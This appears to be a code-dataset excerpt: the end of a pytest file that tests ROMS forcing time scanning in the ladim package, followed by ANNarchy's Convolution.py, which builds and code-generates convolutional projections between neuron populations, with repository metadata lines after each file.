files = ["test_file05.nc", "test_file03.nc"]
with pytest.raises(SystemExit):
all_frames, time_frames = Forcing.scan_file_times(files)
# Duplicate time frames
files = ["test_file05.nc", "test_file05.nc"]
with pytest.raises(SystemExit):
all_frames, time_frames = Forcing.scan_file_times(files)
def test_forcing_steps(nc_files):
# Test OK
start = np.datetime64("2015-01-03 13:00:00")
stop = np.datetime64("2015-01-04 19:00:00")
dt = 1800
config = dict(start_time=start, stop_time=stop, dt=dt)
files = [f"test_file{i:02d}.nc" for i in range(10)]
all_frames, num_frames = Forcing.scan_file_times(files)
steps, file_idx, frame_idx = Forcing.forcing_steps(
config, files, all_frames, num_frames
)
assert len(steps) == len(all_frames)
dstart = start - np.datetime64("2015-01-01")
k = int(dstart / np.timedelta64(dt, "s"))
assert steps[0] == -k
assert steps[1] - steps[0] == 3600 / dt
assert steps[3] - steps[0] == 24 * 3600 / dt
d = 5 # file number = day number
f = 1 # time frame = hour, 0 <= f < 3
k = d * 3 + f # forcing index
# time step from first file,
# 1 file per day, 1 hour per time frame, 2 steps per hour
v = steps[0] + (d * 24 + f) * 2
assert all_frames[k] == np.datetime64(f"2015-01-{1+d:02d} {f:02d}")
assert steps[k] == v
assert file_idx[v] == f"test_file{d:02d}.nc"
assert frame_idx[v] == f # second time frame in file
|
bjornaa/ladim
|
test/test_ROMS_forcing.py
|
Python
|
mit
| 3,662
|
[
"NetCDF"
] |
236f54ca0226f9c55e7e22a011b158ea00afd15883f8b2914efd4f7a3da964e2
|
# =============================================================================
#
# Convolution.py
#
# This file is part of ANNarchy.
#
# Copyright (C) 2019 Julien Vitay <julien.vitay@gmail.com>,
# Helge Uelo Dinkelbach <helge.dinkelbach@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ANNarchy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# =============================================================================
from __future__ import print_function
import numpy as np
from copy import deepcopy
from ANNarchy.core import Global
from ANNarchy.core.Projection import Projection
from ANNarchy.generator.Utils import tabify
from .ConvolveTemplate import *
from .Utils import SharedSynapse
# Indices used for each dimension
indices = ['i', 'j', 'k', 'l', 'm', 'n']
class Convolution(Projection):
"""
Performs a convolution of a weight kernel on the pre-synaptic population.
Despite its name, the operation performed is actually a cross-correlation, as is usual in computer vision and convolutional neural networks:
$$g(x) = \sum_{k=-n}^n h(k) \, f(x + k)$$
The convolution operation benefits from giving a multi-dimensional geometry to the populations and filters, for example in 2D:
```python
inp = Population(geometry=(100, 100), neuron=Neuron(parameters="r = 0.0"))
pop = Population(geometry=(100, 100), neuron=Neuron(equations="r = sum(exc)"))
proj = Convolution(inp, pop, 'exc')
proj.connect_filter(
[
[-1., 0., 1.],
[-1., 0., 1.],
[-1., 0., 1.]
])
```
The maximum number of dimensions for populations and filters is 4, an error is thrown otherwise.
Depending on the number of dimensions of the pre- and post-synaptic populations, as well as of the kernel, the convolution is implemented differentely.
**Method connect_filter()**
* If the pre- and post-populations have the same dimension as the kernel, the convolution is regular. Example:
(100, 100) * (3, 3) -> (100, 100)
* If the post-population has one dimension less than the pre-synaptic one, the last dimension of the kernel must match the last one of the pre-synaptic population. Example:
(100, 100, 3) * (3, 3, 3) -> (100, 100)
* If the kernel has less dimensions than the two populations, the number of neurons in the last dimension of the populations must be the same. The convolution will be calculated for each feature map in the last dimension. In this case, you must set ``keep_last_dimension`` to ``True``. Example:
(100, 100, 16) * (3, 3) -> (100, 100, 16)
**Method connect_filters()**
* If the kernel has more dimensions than the pre-synaptic population, this means a bank of different filters will be applied on the pre-synaptic population (like a convolutional layer in a CNN). Attention: the first index of ``weights`` corresponds to the different filters, while the result will be accessible in the last dimension of the post-synaptic population. You must set the ``multiple`` argument to True. Example:
(100, 100) * (16, 3, 3) -> (100, 100, 16)
The convolution **always** uses padding for elements that would be outside the array (no equivalent of ``valid`` in tensorflow). It is 0.0 by default, but can be changed using the ``padding`` argument. Setting ``padding`` to the string ``border`` will repeat the value of the border elements.
Sub-sampling will be automatically performed according to the populations' geometry. If these geometries do not match, an error will be thrown. Example:
(100, 100) * (3, 3) -> (50, 50)
You can redefine the sub-sampling by providing a list ``subsampling`` as argument, defining for each post-synaptic neuron the coordinates of the pre-synaptic neuron which will be the center of the filter/kernel.
"""
def __init__(self, pre, post, target, psp="pre.r * w", operation="sum", name=None, copied=False):
"""
:param pre: pre-synaptic population (either its name or a ``Population`` object).
:param post: post-synaptic population (either its name or a ``Population`` object).
:param target: type of the connection
:param psp: continuous influence of a single synapse on the post-synaptic neuron (default for rate-coded: ``w*pre.r``).
:param operation: operation (sum, max, min, mean) performed by the kernel (default: sum).
"""
# Create the description, but it will not be used for generation
Projection.__init__(
self,
pre,
post,
target,
synapse=SharedSynapse(psp=psp, operation=operation, name="Convolution operation", description="Convoluted kernel over the pre-synaptic population."),
name=name,
copied=copied
)
# Disable saving
self._saveable = False
# For copy
self._used_single_filter = False
self._used_bank_of_filters = False
self.operation = operation
def connect_filter(self, weights, delays=0.0, keep_last_dimension=False, padding=0.0, subsampling=None):
"""
Applies a single filter on the pre-synaptic population.
:param weights: numpy array or list of lists representing the matrix of weights for the filter.
:param delays: delay in synaptic transmission (default: dt). Can only be the same value for all neurons.
:param keep_last_dimension: defines if the last dimension of the pre- and post-synaptic will be convolved in parallel. The weights matrix must have one dimension less than the pre-synaptic population, and the number of neurons in the last dimension of the pre- and post-synaptic populations must match. Default: False.
:param padding: value to be used for the rates outside the pre-synaptic population. If it is a floating value, the pre-synaptic population is virtually extended with this value above its boundaries. If it is equal to 'border', the values on the boundaries are repeated. Default: 0.0.
:param subsampling: list for each post-synaptic neuron of coordinates in the pre-synaptic population defining the center of the kernel/filter. Default: None.
"""
# Process the weights
self.weights = np.array(weights)
# Process the delays
self.delays = float(delays)
if not isinstance(delays, (int, float)):
Global._error('Convolutions can only have constant delays.')
self.subsampling = subsampling
self.keep_last_dimension = keep_last_dimension
self.padding = padding
self.multiple = False
# Check dimensions of populations and weight matrix
self.dim_kernel = self.weights.ndim
self.dim_pre = self.pre.dimension
self.dim_post = self.post.dimension
if self.dim_post > 4:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the post-synaptic population (maximum 4).')
if self.dim_pre > 4:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the pre-synaptic population (maximum 4).')
if self.dim_kernel > 5 or (not self.multiple and self.dim_kernel > 4):
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the kernel (maximum 4).')
# Check if the last axes match for parallel convolution (e.g. 3-2-3)
if self.dim_kernel < self.dim_pre:
if not self.keep_last_dimension:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the kernel has less dimensions than the pre-synaptic population, you need to set the flag keep_last_dimension to True.')
if self.pre.geometry[-1] != self.post.geometry[-1]:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the kernel has fewer dimensions than the two populations (keep_last_dimension=True), these must have the same number of neurons in the last dimension.')
# If the last dim of the kernel matches the last dim of the pre-pop, the last pop can have one dimension less.
if self.dim_post < self.dim_pre: # OK, but check the last dimension of the kernel has the same size as the post-population
if self.weights.shape[-1] != self.pre.geometry[-1]:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the post-synaptic population has less dimensions than the pre-synaptic one, the last dimension of the filter must be equal to the last of the pre-synaptic population.')
# Check if it is a bank of filters
if self.dim_kernel > self.dim_pre:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the kernel has more dimensions than the pre-synaptic population, you need to use the connect_filters() method.')
# Generate the pre-synaptic coordinates
self._generate_pre_coordinates()
# Finish building the synapses
self._create()
# For copy
self._used_single_filter = True
return self
def connect_filters(self, weights, delays=0.0, keep_last_dimension=False, padding=0.0, subsampling=None):
"""
Applies a set of different filters on the pre-synaptic population.
The weights matrix must have one dimension more than the pre-synaptic populations, and the number of neurons in the last dimension of the post-synaptic population must be equal to the number of filters.
:param weights: numpy array or list of lists representing the matrix of weights for the filter.
:param delays: delay in synaptic transmission (default: dt). Can only be the same value for all neurons.
:param keep_last_dimension: defines if the last dimension of the pre- and post-synaptic will be convolved in parallel. The weights matrix must have one dimension less than the pre-synaptic population, and the number of neurons in the last dimension of the pre- and post-synaptic populations must match. Default: False.
:param padding: value to be used for the rates outside the pre-synaptic population. If it is a floating value, the pre-synaptic population is virtually extended with this value above its boundaries. If it is equal to 'border', the values on the boundaries are repeated. Default: 0.0.
:param subsampling: list for each post-synaptic neuron of coordinates in the pre-synaptic population defining the center of the kernel/filter. Default: None.
"""
# Process the weights
self.weights = np.array(weights)
# Process the delays
self.delays = float(delays)
if not isinstance(delays, (int, float)):
Global._error('Convolutions can only have constant delays.')
self.subsampling = subsampling
self.keep_last_dimension = keep_last_dimension
self.padding = padding
self.multiple = True
# Check dimensions of populations and weight matrix
self.dim_kernel = self.weights.ndim
self.dim_pre = self.pre.dimension
self.dim_post = self.post.dimension
if self.dim_post > 4:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the post-synaptic population (maximum 4).')
if self.dim_pre > 4:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the pre-synaptic population (maximum 4).')
if self.dim_kernel > 5 or (not self.multiple and self.dim_kernel > 4):
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: Too many dimensions for the kernel (maximum 4).')
# Check if the last axes match for parallel convolution (e.g. 3-2-3)
if self.dim_kernel < self.dim_pre:
if not self.keep_last_dimension:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the kernel has less dimensions than the pre-synaptic population, you need to set the flag keep_last_dimension to True.')
if self.pre.geometry[-1] != self.post.geometry[-1]:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the kernel has fewer dimensions than the two populations (keep_last_dimension=True), these must have the same number of neurons in the last dimension.')
# If the last dim of the kernel matches the last dim of the pre-pop, the last pop can have one dimension less.
if self.dim_post < self.dim_pre: # OK, but check the last dimension of the kernel has the same size as the post-population
if self.weights.shape[-1] != self.pre.geometry[-1]:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: If the post-synaptic population has less dimensions than the pre-synaptic one, the last dimension of the filter must be equal to the last of the pre-synaptic population.')
# The last dimension of the post population must correspond to the number of filters
if self.weights.shape[0] != self.post.geometry[-1]:
print("Convolution:", self.dim_pre, '*', self.dim_kernel, '->', self.dim_post)
Global._error('Convolution: For multiple filters, the last dimension of the post-synaptic population must have as many neurons as there are filters.')
# Generate the pre-synaptic coordinates
self._generate_pre_coordinates_bank()
# Finish building the synapses
self._create()
# For copy
self._used_bank_of_filters = True
return self
def _copy(self, pre, post):
"Returns a copy of the projection when creating networks. Internal use only."
copied_proj = Convolution(pre=pre, post=post, target=self.target, operation=self.operation, name=self.name, copied=True)
copied_proj.delays = self.delays
copied_proj.weights = self.weights
copied_proj.subsampling = self.subsampling
copied_proj.keep_last_dimension = self.keep_last_dimension
copied_proj.padding = self.padding
copied_proj.multiple = self.multiple
copied_proj.dim_kernel = self.weights.ndim
copied_proj.dim_pre = self.pre.dimension
copied_proj.dim_post = self.post.dimension
if self._used_single_filter:
copied_proj._generate_pre_coordinates()
elif self._used_bank_of_filters:
copied_proj._generate_pre_coordinates_bank()
else:
raise ValueError("Either use single filter or bank of filter must be True! (Missing connect?)")
copied_proj._create()
copied_proj._connection_method = self._connection_method
copied_proj._connection_args = self._connection_args
copied_proj._connection_delay = self._connection_delay
copied_proj._storage_format = self._storage_format
return copied_proj
def _create(self):
# create fake LIL object, just for compilation.
try:
from ANNarchy.core.cython_ext.Connector import LILConnectivity
except Exception as e:
Global._print(e)
Global._error('ANNarchy was not successfully installed.')
lil = LILConnectivity()
lil.max_delay = self.delays
lil.uniform_delay = self.delays
self.connector_name = "Convolution"
self.connector_description = "Convolution"
self._store_connectivity(self._load_from_lil, (lil, ), self.delays)
################################
### Create connection pattern
################################
def _connect(self, module):
"""
Builds up dendrites either from list or dictionary. Called by instantiate().
"""
if not self._connection_method:
Global._error('Convolution: The projection between ' + self.pre.name + ' and ' + self.post.name + ' is declared but not connected.')
# Create the Cython instance
proj = getattr(module, 'proj'+str(self.id)+'_wrapper')
self.cyInstance = proj(self.weights, self.pre_coordinates)
# Set delays after instantiation
if self.delays > 0.0:
self.cyInstance.set_delay(self.delays/Global.config['dt'])
def _generate_pre_coordinates(self):
" Returns a list for each post neuron of the corresponding center coordinates."
# Check if the list is already defined:
if self.subsampling:
try:
shape = np.array(self.subsampling).shape
except:
Global._error('Convolution: The sub-sampling list must have', self.post.size, 'elements of size', self.pre.dimension)
return
if shape != (self.post.size, self.pre.dimension):
Global._error('Convolution: The sub-sampling list must have', self.post.size, 'elements of size', self.pre.dimension)
return
self.pre_coordinates = self.subsampling
return
# Otherwise create it, possibly with sub-sampling
coords = [[] for i in range(self.post.size)]
# Compute pre-indices
idx_range= []
for dim in range(self.dim_pre):
if dim < self.dim_post:
pre_size = int(self.pre.geometry[dim])
post_size = int(self.post.geometry[dim])
sample = int(pre_size/post_size)
if post_size * sample != pre_size:
Global._error('Convolution: The pre-synaptic dimensions must be a multiple of the post-synaptic ones for down-sampling to work.')
idx_range.append([int((sample-1)/2) + sample * i for i in range(post_size)])
else: # extra dimension
if self.keep_last_dimension:
idx_range.append(range(self.post.geometry[dim]))
else:
idx_range.append([self._center_filter(self.weights.shape[dim])])
# Generates coordinates TODO: Find a more robust way!
if self.dim_pre == 1 :
rk = 0
for i in idx_range[0]:
coords[rk] = [i]
rk += 1
elif self.dim_pre == 2 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
coords[rk] = [i, j]
rk += 1
elif self.dim_pre == 3 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
for k in idx_range[2]:
coords[rk] = [i, j, k]
rk += 1
elif self.dim_pre == 4 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
for k in idx_range[2]:
for l in idx_range[3]:
coords[rk] = [i, j, k, l]
rk += 1
# Save the result
self.pre_coordinates = coords
def _generate_pre_coordinates_bank(self):
" Returns a list for each post neuron of the corresponding center coordinates, when the filter is a bank."
self.nb_filters = self.weights.shape[0]
self.dim_single_filter = self.weights.shape[1:]
# Check if the list is already defined:
if self.subsampling:
try:
shape = np.array(self.subsampling).shape
except:
Global._error('Convolution: The sub-sampling list must have', self.post.size / self.post.geometry[-1], 'elements of size', self.pre.dimension)
return
if shape != (self.post.size/ self.post.geometry[-1], self.pre.dimension):
Global._error('Convolution: The sub-sampling list must have', self.post.size/ self.post.geometry[-1], 'elements of size', self.pre.dimension)
return
self.pre_coordinates = [c + [d] for c in self.subsampling for d in range(self.nb_filters)]
return
# Otherwise create it, possibly with sub-sampling
coords = [[] for i in range(self.post.size)]
# Compute pre-indices
idx_range= []
for dim in range(self.dim_pre):
if dim < self.dim_post -1:
pre_size = self.pre.geometry[dim]
post_size = self.post.geometry[dim]
sample = int(pre_size/post_size)
if post_size * sample != pre_size:
Global._error('Convolution: The pre-synaptic dimensions must be a multiple of the post-synaptic ones for down-sampling to work.')
idx_range.append([int((sample-1)/2) + sample * i for i in range(post_size)])
else: # extra dimension
if self.keep_last_dimension:
idx_range.append(range(self.post.geometry[dim]))
else:
idx_range.append([self._center_filter(self.weights.shape[dim+1])])
# Generates coordinates TODO: Find a more robust way!
if self.dim_pre == 1 :
rk = 0
for i in idx_range[0]:
for d in range(self.nb_filters):
coords[rk] = [i, d]
rk += 1
elif self.dim_pre == 2 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
for d in range(self.nb_filters):
coords[rk] = [i, j, d ]
rk += 1
elif self.dim_pre == 3 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
for k in idx_range[2]:
for d in range(self.nb_filters):
coords[rk] = [i, j, k, d]
rk += 1
elif self.dim_pre == 4 :
rk = 0
for i in idx_range[0]:
for j in idx_range[1]:
for k in idx_range[2]:
for l in idx_range[3]:
for d in range(self.nb_filters):
coords[rk] = [i, j, k, l, d]
rk += 1
# Save the result
self.pre_coordinates = coords
################################
# Code generation
################################
def _generate(self):
"""
Overrides default code generation. This function is called during the code generation procedure.
"""
# Filter definition
filter_definition, filter_pyx_definition = self._filter_definition()
# Convolve_code
if not self.multiple:
convolve_code, sum_code = self._generate_convolve_code()
else:
convolve_code, sum_code = self._generate_bank_code()
if Global._check_paradigm("openmp"):
self._generate_omp(filter_definition, filter_pyx_definition, convolve_code, sum_code)
elif Global._check_paradigm("cuda"):
raise NotImplementedError
else:
raise NotImplementedError
def _generate_omp(self, filter_definition, filter_pyx_definition, convolve_code, sum_code, kernel=True):
"""
OpenMP code generation.
"""
# Basic ids
base_ids = {
'id_proj': self.id,
'size_post': self.post.size,
'float_prec': Global.config['precision']
}
# Fill the basic definitions
conv_dict = deepcopy(convole_template_omp)
for key, value in conv_dict.items():
value = value % base_ids
conv_dict[key] = value
self._specific_template.update(conv_dict)
# Kernel-based method: specify w with the correct dimension
if kernel:
self._specific_template['declare_parameters_variables'] = tabify(filter_definition.strip(), 1)
self._specific_template['export_parameters_variables'] = ""
self._specific_template['access_parameters_variables'] = """
// Local parameter w
%(type_w)s get_w() { return w; }
void set_w(%(type_w)s value) { w = value; }
""" % {'type_w': filter_definition.replace(' w;', '')}
self._specific_template['export_connectivity'] += """
# Local variable w
%(type_w)s get_w()
void set_w(%(type_w)s)
""" % {'type_w': filter_pyx_definition.replace(' w', '')}
self._specific_template['wrapper_init_connectivity'] += """
proj%(id_proj)s.set_w(weights)
""" % {'id_proj': self.id}
self._specific_template['wrapper_access_connectivity'] += """
# Local variable w
def get_w(self):
return proj%(id_proj)s.get_w()
def set_w(self, value):
proj%(id_proj)s.set_w( value )
def get_dendrite_w(self, int rank):
return proj%(id_proj)s.get_w()
def set_dendrite_w(self, int rank, value):
proj%(id_proj)s.set_w(value)
def get_synapse_w(self, int rank_post, int rank_pre):
return 0.0
def set_synapse_w(self, int rank_post, int rank_pre, %(float_prec)s value):
pass
""" % {'id_proj': self.id, 'float_prec': Global.config['precision']}
# Override the monitor to avoid recording the weights
self._specific_template['monitor_class'] = ""
self._specific_template['monitor_export'] = ""
self._specific_template['monitor_wrapper'] = ""
# OMP code
omp_code = ""
if Global.config['num_threads'] > 1:
omp_code = """
#pragma omp for private(sum, rk_pre, coord) %(psp_schedule)s""" % {'psp_schedule': "" if not 'psp_schedule' in self._omp_config.keys() else self._omp_config['psp_schedule']}
# HD ( 16.10.2015 ):
# pre-load delayed firing rate in a local array, so we
# prevent multiple accesses to pop%(id_pre)s._delayed_r[delay-1]
# wheareas delay is set available as variable
# TODO HD: wouldn't it be much better to reduce delay globaly, instead of the substraction here???
if self.delays > Global.config['dt']:
pre_load_r = """
// pre-load delayed firing rate
auto delayed_r = pop%(id_pre)s._delayed_r[delay-1];
"""% {'id_pre': self.pre.id}
else:
pre_load_r = ""
# Compute sum
wsum = """
if ( _transmission && pop%(id_pre)s._active ) {
int* coord;
""" + pre_load_r + """
%(omp_code)s
for(int i = 0; i < %(size_post)s; i++){
coord = pre_coords[i].data();
// perform the convolution
""" + tabify(convolve_code, 1) + """
// store result
pop%(id_post)s._sum_%(target)s[i] += """ + sum_code + """;
} // for
} // if
"""
self._specific_template['psp_code'] = wsum % \
{ 'id_proj': self.id,
'target': self.target,
'id_pre': self.pre.id, 'name_pre': self.pre.name, 'size_pre': self.pre.size,
'id_post': self.post.id, 'name_post': self.post.name, 'size_post': self.post.size,
'omp_code': omp_code,
'convolve_code': convolve_code
}
self._specific_template['size_in_bytes'] = """
// post-ranks
size_in_bytes += sizeof(std::vector<int>);
size_in_bytes += post_rank.capacity() * sizeof(int);
// pre-coords
size_in_bytes += sizeof(std::vector<std::vector<int>>);
size_in_bytes += pre_coords.capacity() * sizeof(std::vector<int>);
for (auto it = pre_coords.begin(); it != pre_coords.end(); it++) {
size_in_bytes += it->capacity() * sizeof(int);
}
// filter
// TODO:
"""
self._specific_template['clear'] = """
// post-ranks
post_rank.clear();
post_rank.shrink_to_fit();
// pre-coords
for (auto it = pre_coords.begin(); it != pre_coords.end(); it++) {
it->clear();
it->shrink_to_fit();
}
pre_coords.clear();
pre_coords.shrink_to_fit();
// filter
// TODO:
"""
################################
### Utilities
################################
def _center_filter(self, i):
return int(i/2) if i%2==1 else int(i/2)-1
def _filter_definition(self):
dim = self.dim_kernel
cpp = Global.config['precision']
pyx = Global.config['precision']
for d in range(dim):
cpp = 'std::vector< ' + cpp + ' >'
pyx = 'vector[' + pyx + ']'
cpp += ' w;'
pyx += ' w'
return cpp, pyx
def _coordinates_to_rank(self, name, geometry):
dim = len(geometry)
txt = ""
for d in range(dim):
if txt == "" : # first coordinate is special
txt = indices[0] + "_" + name
else:
txt = str(geometry[d]) + '*(' + txt + ') + ' + indices[d] + '_' + name
return txt
def _generate_convolve_code(self):
# Operation to be performed: sum, max, min, mean
operation = self.synapse_type.operation
# Main code
code = tabify("sum = 0.0;\n", 3)
# Generate for loops
for dim in range(self.dim_kernel):
if dim == self.dim_kernel-1:
inner_idx = ""
for i in range(self.dim_kernel-1):
inner_idx += "["+indices[i]+"_w]"
code += "auto inner_line = w"+inner_idx+".data();\n"
code += tabify("""
for(int %(index)s_w = 0; %(index)s_w < %(size)s;%(index)s_w++) {
""" % { 'index': indices[dim], 'size': self.weights.shape[dim]}, dim)
# Compute indices
if dim < self.dim_kernel:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s] %(operator)s (%(index)s_w - %(center)s);""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim,
'operator': '+' ,
'center': self._center_filter(self.weights.shape[dim])
}, 1)
else:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s];""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim
}, 1)
# Check indices
if operation in ['sum', 'mean']:
if isinstance(self.padding, str): # 'border'
code += tabify("""
if (%(index)s_pre < 0) %(index)s_pre = 0 ;
if (%(index)s_pre > %(max_size)s) %(index)s_pre = %(max_size)s ;
""" % { 'index': indices[dim], 'dim': dim, 'max_size': self.pre.geometry[dim] -1}, dim)
else:
code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)){
sum += %(padding)s;
continue;
}
""" % { 'index': indices[dim], 'padding': self.padding, 'max_size': self.pre.geometry[dim] -1}, dim)
else: # min, max
code += """
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)) {
continue;
}
""" % { 'index': indices[dim], 'max_size': self.pre.geometry[dim] -1}
# if True, we need to take the last dimension from coords
if self.keep_last_dimension:
id_dict = {
'index': indices[self.dim_kernel],
'dim': self.dim_kernel
}
code += "int %(index)s_pre = coord[%(dim)s];" % id_dict
# Compute pre-synaptic rank
code += tabify("""
rk_pre = %(value)s;""" % {'value': self._coordinates_to_rank('pre', self.pre.geometry)}, dim)
# Compute the increment
index = ""
for dim in range(self.dim_kernel):
index += '[' + indices[dim] + '_w]'
increment = self.synapse_type.description['psp']['cpp'] % {
'id_pre': self.pre.id,
'id_post': self.post.id,
'local_index': index,
'global_index': '[i]',
'pre_index': '[rk_pre]',
'post_index': '[rk_post]',
'pre_prefix': 'pop'+str(self.pre.id)+'.',
'post_prefix': 'pop'+str(self.post.id)+'.'
}
# Delays
if self.delays > Global.config['dt']:
increment = increment.replace(
'pop%(id_pre)s.r[rk_pre]' % {'id_pre': self.pre.id},
'delayed_r[rk_pre]'
)
# Apply the operation
if operation == "sum":
if self.dim_kernel == 1:
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, dim)
else:
code += tabify("""
sum += %(increment)s""" % {'increment': increment.replace('w'+inner_idx, 'inner_line')}, dim)
elif operation == "max":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp > sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, dim)
elif operation == "min":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp < sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, dim)
elif operation == "mean":
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, dim)
else:
Global._error('Convolution: Operation', operation, 'is not implemented yet for shared projections.')
# Close for loops
for dim in range(self.dim_kernel):
code += tabify("""
}""", self.dim_kernel-1-dim)
impl_code = code % {'id_proj': self.id,
'target': self.target,
'id_pre': self.pre.id,
'name_pre': self.pre.name,
'size_pre': self.pre.size,
'id_post': self.post.id,
'name_post': self.post.name,
'size_post': self.post.size
}
# sum code
self.weights.size
if operation == "mean":
sum_code = """sum/%(filter_size)s""" % {'filter_size': self.weights.size}
else:
sum_code = "sum"
return impl_code, sum_code
def _generate_bank_code(self):
# Operation to be performed: sum, max, min, mean
operation = self.synapse_type.operation
# Main code
code = tabify("sum = 0.0;\n", 3)
# Generate for loops
for dim in range(self.dim_kernel-1):
code += tabify("""
for(int %(index)s_w = 0; %(index)s_w < %(size)s;%(index)s_w++) {
""" % { 'index': indices[dim], 'size': self.weights.shape[dim+1]}, dim)
# Compute indices
if dim < self.dim_kernel:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s] %(operator)s (%(index)s_w - %(center)s);""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim,
'operator': '+',
'center': self._center_filter(self.weights.shape[dim+1])
}, 1)
else:
code += tabify(
"""int %(index)s_pre = coord[%(dim)s];""" %
{
'id_proj': self.id,
'index': indices[dim],
'dim': dim
}, 1)
# Check indices
if operation in ['sum', 'mean']:
if isinstance(self.padding, str): # 'border'
code += tabify("""
if (%(index)s_pre < 0) %(index)s_pre = 0 ;
if (%(index)s_pre > %(max_size)s) %(index)s_pre = %(max_size)s ;
""" % { 'index': indices[dim], 'dim': dim, 'max_size': self.pre.geometry[dim] -1}, 1+dim)
else:
code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)) {
sum += %(padding)s;
continue;
}
""" % { 'index': indices[dim], 'padding': self.padding, 'max_size': self.pre.geometry[dim] -1}, 1+dim)
else: # min, max
code += tabify("""
if ((%(index)s_pre < 0) || (%(index)s_pre > %(max_size)s)){
continue;
}
""" % { 'index': indices[dim], 'max_size': self.pre.geometry[dim] -1}, 1+dim)
# Compute pre-synaptic rank
code +=tabify("""
rk_pre = %(value)s;""" % {'value': self._coordinates_to_rank('pre', self.pre.geometry)}, 1+dim)
# Compute the increment
index = "[coord["+str(self.dim_pre)+"]]"
for dim in range(self.dim_kernel-1):
index += '[' + indices[dim] + '_w]'
increment = self.synapse_type.description['psp']['cpp'] % {
'id_pre': self.pre.id,
'id_post': self.post.id,
'local_index': index,
'global_index': '[i]',
'pre_index': '[rk_pre]',
'post_index': '[rk_post]',
'pre_prefix': 'pop'+str(self.pre.id)+'.',
'post_prefix': 'pop'+str(self.post.id)+'.'}
# Delays
if self.delays > Global.config['dt']:
increment = increment.replace(
'pop%(id_pre)s.r[rk_pre]' % {'id_pre': self.pre.id},
'delayed_r[rk_pre]'
)
# Apply the operation
if operation == "sum":
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, 1+dim)
elif operation == "max":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp > sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, 1+dim)
elif operation == "min":
code += tabify("""
%(float_prec)s _psp = %(increment)s
if(_psp < sum) sum = _psp;""" % {'increment': increment, 'float_prec': Global.config['precision']}, 1+dim)
elif operation == "mean":
code += tabify("""
sum += %(increment)s""" % {'increment': increment}, 1+dim)
else:
Global._error('SharedProjection: Operation', operation, 'is not implemented yet for shared projections.')
# Close for loops
for dim in range(self.dim_kernel-1):
code += tabify("""
}""", self.dim_kernel-1-dim)
impl_code = code % {'id_proj': self.id,
'target': self.target,
'id_pre': self.pre.id, 'name_pre': self.pre.name, 'size_pre': self.pre.size,
'id_post': self.post.id, 'name_post': self.post.name, 'size_post': self.post.size
}
# sum code
if operation == "mean":
sum_code = """sum/%(filter_size)s""" % {'filter_size': self.weights.size}
else:
sum_code = "sum"
return impl_code, sum_code
##############################
## Override useless methods
##############################
def _data(self):
"Disable saving."
desc = {}
desc['post_ranks'] = self.post_ranks
desc['attributes'] = self.attributes
desc['parameters'] = self.parameters
desc['variables'] = self.variables
desc['dendrites'] = []
desc['number_of_synapses'] = 0
return desc
def save_connectivity(self, filename):
"Not available."
Global._warning('Convolutional projections can not be saved.')
def save(self, filename):
"Not available."
Global._warning('Convolutional projections can not be saved.')
def load(self, filename):
"Not available."
Global._warning('Convolutional projections can not be loaded.')
def receptive_fields(self, variable = 'w', in_post_geometry = True):
"Not available."
Global._warning('Convolutional projections can not display receptive fields.')
def connectivity_matrix(self, fill=0.0):
"Not available."
Global._warning('Convolutional projections can not display connectivity matrices.')
|
vitay/ANNarchy
|
ANNarchy/extensions/convolution/Convolve.py
|
Python
|
gpl-2.0
| 41,839
|
[
"NEURON"
] |
c3342615213cbb6735e189b96a120d66b675e96ebf4c060a535689ff83148861
|
#!/usr/bin/python
